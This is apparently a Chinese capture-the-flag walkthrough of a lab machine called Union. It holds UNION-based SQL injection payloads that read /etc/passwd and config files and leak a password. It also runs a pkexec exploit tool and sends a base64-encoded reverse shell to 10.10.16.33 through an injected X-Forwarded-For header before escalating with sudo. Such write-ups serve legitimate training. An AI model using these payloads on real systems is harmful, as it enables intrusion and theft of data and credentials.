[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升

Information Gathering

IP Address Opening Ports
10.10.11.128 TCP:80

$ ip='10.10.11.128'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLI

player=' union select 9;--±

player=' union select group_concat(schema_name) from information_schema.schemata;--±

player=' union select group_concat(table_name) from information_schema.columns where table_schema='november';--±

player=' union select group_concat(one) from november.flag;--±

UHC{F1rst_5tep_2_Qualify}

http://10.10.11.128/challenge.php

player=' union select group_concat(player) from november.players;--±

ippsec,celesian,big0us,luska,tinyboy
player=' union select load_file('/etc/passwd');--±

player=' union select load_file('/var/www/html/index.php');--±

player=' union select load_file('/var/www/html/config.php');--±

username:uhc

password:uhc-11qual-global-pw

User.txt

1618310a48daa65a153e7ca160f99720

TRP00F

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.33 --lport 10000 --rhost 10.10.16.33 --rport 10032 --http 9999

! Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

Privilege Escalation:Command Injection && sudo

复制代码
$ curl -X GET "http://10.10.11.128/firewall.php" \
-H "Host: 10.10.11.128" \
-H "Cache-Control: max-age=0" \
-H "Upgrade-Insecure-Requests: 1" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36" \
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" \
-H "Referer: http://10.10.11.128/challenge.php" \
-H "Accept-Encoding: gzip, deflate" \
-H "Accept-Language: en-US,en;q=0.9" \
-H "Cookie: PHPSESSID=34m0q9j1uck8sv7cbstv0vpu6p" \
-H "Connection: close" \
-H "X-Forwarded-For: 1.1.1.1;echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjMzLzQ0MyAwPiYx|base64 -d |bash;"

$ sudo su

Root.txt

c6c82ef44b36fad95d3711546e31d86a

相关推荐
QYR-分析8 小时前
机器人安全控制器行业高速扩容 本土替代迎来全新发展窗口期
人工智能·安全·机器人
IpdataCloud9 小时前
担心IP暴露隐私?用安全IP查询工具自查,三步配置网络出口
网络·tcp/ip·安全·ip
JerrySir12 小时前
恶意 npm 包只活了 17 分钟:技术面试里,为什么“升级依赖”还不算止血?
javascript·安全
白帽小阳13 小时前
2026前端面试题!(附答案及解析)
javascript·网络·python·安全·web安全·网络安全·护网行动
xd18557855514 小时前
电影匹配引擎-基于鸿蒙的心情电影推荐应用开发实践
人工智能·安全·华为·harmonyos·鸿蒙
白帽小阳14 小时前
[特殊字符]【2026最新】零基础入门学网络安全(详细路线图),看这篇就够了!
学习·安全·web安全·网络安全·安全运营·学习路线·web渗透
qetfw15 小时前
CentOS 7 配置 iptables 防火墙
安全
磐链科技15 小时前
区块链链游安全警示:常见漏洞与攻击手段
安全·区块链
数据知道17 小时前
HTTP/HTTPS 安全深度剖析:抓包、解密与证书陷阱
安全·http·https·mitmproxy·抓包解密
AI创界者17 小时前
安全测试环境搭建:在 Kali Linux 中部署与配置开源 WebShell 管理工具 AntSword(蚁剑)
linux·运维·安全